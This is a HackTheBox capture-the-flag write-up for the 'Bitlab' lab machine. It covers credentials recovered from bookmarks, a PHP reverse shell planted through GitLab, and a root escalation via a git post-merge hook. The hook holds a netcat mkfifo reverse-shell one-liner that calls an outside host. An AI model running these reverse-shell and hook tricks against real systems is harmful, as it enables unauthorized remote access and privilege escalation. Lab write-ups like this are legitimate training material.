Bitlab — HackTheBox
This is a write-up on how I solved Bitlab from HacktheBox.
Hack the Box is an online platform to test and advance your skills in penetration testing and cybersecurity.
about this box:
Bitlab is a medium difficulty box. Bitlab was such a good and fun box because it demonstrated real-life setups and vulnerabilities not because of old versions but because of how boxes are setup (over permission-binaries, reconfigured or over-exposed network services, people sticking keys in places they really should not be, etc).
Recon:
Use Nmap to scan the target ports:
nmap Network exploration tool and security / port scanner
-sV (Version detection)
-sC Performs a script scan using the default set of scripts.
-o Output file.
Only two ports are opened 22 and 80. We have SSH on port 22 and Gitlab on port 80.
Without directory enumeration with the Gobuster we already know that there is robots.txt which has some disallowed entries.
If we look at the /help/ entry we will see bookmarks.html
Which contains some elements, One of them contains obfuscated data
After deobfuscation, we have a Username and Password.
clave:11des0081x
And we are in!
After the login into Gitlab we know that we have 2 projects and snippets. and with user clave, we probably can edit index.php in Administrator/profile project.
Okay, time to get the Reverse shell.
Grab PHP reverse shell from Pentestermonkey — reverse shell
Then, get the IP address with ifconfig tun0
After getting the IP address change the IP address in the reverse shell
And merge it:
After that, Set Netcat listener with:
nc -nvlp 1234
and to trigger the shell visit:
We can execute git pull without root access with a www-data user.
To get the reverse shell as root, all we need is to add bash reverse shell in .git/hooks/post-merge and after git pull, it will execute the command.
Let’s grab the profile(we can edit it as a clave) project on /tmp/
Its all set.
Let’s get the reverse shell as a root!
Add bash Shebang in .git/hooks/post-merge
echo “#!/bin/bash” > .git/hooks/post-mergeAppend reverse shell in .git/hooks/post-merge
echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.137 1235 >/tmp/f” >> .git/hooks/post-mergeAnd give it execute permission
chmod +x .git/hooks/post-merge
Set up the listener with Netcat:
nc -nvlp 1235
And run:
sudo git pull
Whoops. The repository is already up to date.
To trigger it we need to make some change on the repository.
Edit README.md
And merge it.
Okay, now we can trigger it.
sudo git pull
And we are root without getting the user.
¯\_(ツ)_/¯
let’s forgot about it and get the user from www-data.
Remember snippets from Gitlab? let’s check it.
Bingo! we have one snippet with a database name, username, and password.
The snippet executes query which returns all information from profiles table.
I believe the simplest way to execute it is that change the index.php again (with the snippet) and just trigger it with browser.
By itself, it won't give us any information from the query.
Simple googling and we already know how to show all the results.
Commit, merge and open it with the browser.
Oh boy. We got the credentials.
Huh? maybe the password is the whole text?
Okay SSH without decoding the value.
And we are in, We got the user clave.
Some reverse-engineering
We have RemoteConnection.exe in /home/clave/
let’s Download it with Netcat and do some reverse-engineering with OllyDbg.
Set up a listener on our machine with:
nc -l -p 1234 > RemoteConnection.exe
and Send the file with:
nc -w 3 10.10.15.137 < RemoteConnection.exe
And finally, check integrity with the md5sum command.
We got the file.
Before debugging let’s run strings on it.
Mm, nothing really interesting. Maybe it does some SSH Connection? IDK.
let’s see it with OllyDbg.
OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries. — http://www.ollydbg.de/
So, it does some comparison and after that, it (if it matches) opens the connection.
Open it with OllyDbg and set the breakpoint on JNZ SHORT 00331662
JNZ is jump condition.
And run it.
We have the command in ESI Registry which contains root password.
And we are root, AGAIN!
I hope you enjoyed!
Follow me for future posts.
Twitter — https://twitter.com/ls4cfk